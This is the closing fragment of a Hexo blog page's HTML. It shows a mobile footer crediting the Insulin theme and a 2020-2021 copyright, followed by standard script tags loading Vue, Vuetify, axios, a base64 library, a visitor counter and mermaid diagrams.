                            <div id="mobile-footer" class="d-block d-md-none">
                                <v-divider></v-divider>
                                <div id="mobile-footer-content">
                                    <span>Theme: <a target="_blank" rel="noopener" href="https://github.com/kb1000fx/hexo-theme-insulin">Insulin</a> &nbsp; Powered by <a target="_blank" rel="noopener" href="https://hexo.io/">Hexo</a></span><br>
                                    <span> &copy; 2020 - 2021 Clindy</span>
                                </div>
                            </div>                   
                        </v-col>                                            
                    </v-row>
                </v-container>
            </v-content>
        </v-app>
    </div>
    
<script src="https://cdn.jsdelivr.net/npm/vue@2.6.11"></script>
<script src="https://cdn.jsdelivr.net/npm/vuetify@2.2.30"></script>
<script src="https://cdn.jsdelivr.net/npm/axios/dist/axios.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/js-base64@3.5.2/base64.min.js"></script>

<script src="/js/main.js"></script>




    <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>




    <script src="https://cdn.jsdelivr.net/npm/mermaid@8.4.8/dist/mermaid.min.js"></script>
    <script>mermaid.initialize({
        startOnLoad: true,
        theme: "default"
    });</script>





</body>
</html>